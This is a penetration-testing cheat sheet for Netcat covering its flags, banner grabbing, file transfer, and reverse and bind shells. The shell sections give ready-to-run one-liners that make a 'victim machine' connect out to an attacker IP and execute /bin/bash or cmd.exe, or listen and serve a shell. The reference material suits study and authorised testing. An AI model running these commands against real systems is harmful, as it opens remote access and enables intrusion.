Netcat Cheat Sheet
Introduction
Netcat is a networking tool used to send and receive data over a TCP/UDP network connection. It is often referred to as a networking Swiss army knife as it can be used to carry out various task.
In penetration testing, Netcat is often used to establish a reverse/bind shell with a target machine, transfer files over a network or interact with certain services such as FTP or SMTP.
Netcat Flags
The tools has a number of flags that can be used , these are the main ones:
| Flag | Description |
| -v | Used to provide verbose output. |
| -n | Do not resolve IP addresses when establishing a connection. |
| -l | Used to listen for incoming connections. |
| -p | Used to specify the port to communicate with or to listen on. |
| -e | Used to specify a binary to execute when the connection is established. This has been removed in newer versions of Netcat. |
| -c | Used to specify a command to execute when the connection is established. This has been removed in newer versions of Netcat. |
| -w | Used to specify a timeout period in seconds, after which, if the connection is still in idle, it is closed. |
| -z | Performs a port scan against a given host and port or port range. |
| -i | Used to specify a delay between when data is sent and when it is received. |
| -x | Used to connect to a target using a proxy. If the port is not specified, the well-known port for the proxy protocol is used. |
| -X | Use to specify the proxy protocol to be used. The options are ”4” (SOCKS 4), ”5” (SOCKS 5) and ”connect” (HTTPS). If not specified, SOCKS 5is used. |
Banner Grabbing
Services often have a banner that is displayed when establishing a connection, Banner Grabbing is used to gather information about a service or its version.
This can be performed by establishing a simple connection to the service.
Examples:
| Command | Description |
| nc -nv IP_ADDRESS/URL 80 | HTTP banner grabbing |
| nc -nv IP_ADDRESS 25/2525/465/587 | SMTP banner grabbing |
| nc -nv IP_ADDRESS 110/995 | POP3 banner grabbing |
| nc -nv IP_ADDRESS 143/993 | IMAP banner grabbing |
| nc -nv IP_ADDRESS 21 | FTP banner grabbing |
| nc -nv IP_ADDRESS 23 | Telnet banner grabbing |
| nc -nv IP_ADDRESS 139/445 | SMB/Samba banner grabbing |
File Transfers
Netcat can also be used to transfer files over a network between machines.
Examples:
| Command | Description |
| nc -lvnp 443 > file.txt | Listen for incoming connections and redirect out put to a “file.txt” file. |
| nc -nv IP_ADDRESS 443 < file.txt | Redirect content of a “file.txt” file to a specified IP address on port 443 . |
| cat file.txt | nc IP_ADDRESS 443 | Alternative to the above. |
Reverse/Bind Shells
In penetration testing, Netcat is often used to establish reverse or bind shell with a target machine and therefore gain remote access to the machine.
Reverse Shells
In a reverse shell, the attacker host listens for incoming connections and the target machine connects to it. This method is normally preferred as it is less likely to be blocked by firewall or antivirus software because these normally lock down incoming connections but not outgoing ones.
Examples:
| Command | Description |
| nc -lvnp 443 | Listen for incoming connection on port 443. Used on the attacker machine. |
| nc -nv -e /bin/bash IP_ADDRESS 443 | Connect to a given IP address on port 443 executing the bash shell. Used on the victim machine. |
| nc -nv -e cmd.exe IP_ADDRESS 443 | Same above but used in Windows. |
| nc -nv -c /bin/bash IP_ADDRESS 443 | Connect to a given IP address on port 443 executing the /bin/bash command. Used on the victim machine. |
| nc -nv -c cmd.exe IP_ADDRESS 443 | Same above but used in Windows. |
Bind Shells
In a bind shell, the victim host listens for incoming connections and the attacker machine connects to it. Although this method is more likely to fail, it is often used in public exploits as it does not require an IP address to be specified, so it can be reused without having to generate it again changing the local IP address.
Examples:
| Command | Description |
| nc -lvnp 443 -e /bin/bash | Listen for incoming connection on port 443 and execute the bash shell when a connection is received. Used on the victim machine. |
| nc -lvnp 443 -e cmd.exe | Same above but used in Windows. |
| nc -lvnp 443 -c /bin/bash | Listen for incoming connection on port 443 and execute the /bin/bash command when a connection is received. Used on the victim machine. |
| nc -lvnp 443 -c cmd.exe | Same above but used in Windows. |
Conclusion
Netcat is very powerful tool and it is indispensable to know it really well when performing penetration tests as it allows to perform many network operations with very little effort.
It comes pre-installed with most Linux distributions and there is a Windows executable available that can be used as well.
